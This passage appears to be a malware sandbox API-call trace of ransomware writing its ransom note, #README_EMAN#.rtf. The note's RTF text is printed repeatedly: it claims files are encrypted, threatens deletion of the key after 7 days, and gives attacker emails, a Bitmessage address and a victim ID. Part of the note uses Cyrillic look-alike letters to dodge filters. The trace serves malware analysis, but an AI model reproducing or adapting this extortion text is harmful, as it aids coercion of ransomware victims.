data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0269.081] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x24607d8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nêpñ\x03]Ä\x0bõ5B\x18,", lpUsedDefaultChar=0x0) returned 8717 [0269.081] WriteFile (in: hFile=0x294, lpBuffer=0x24607d8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x24607d8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0269.082] CloseHandle (hObject=0x294) returned 1 [0269.082] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\#README_EMAN#.rtf" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\en-us.16\\#readme_eman#.rtf")) returned 0xffffffff [0269.082] GetLastError () returned 0x2 [0269.082] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\#README_EMAN#.rtf" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\en-us.16\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0269.083] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their 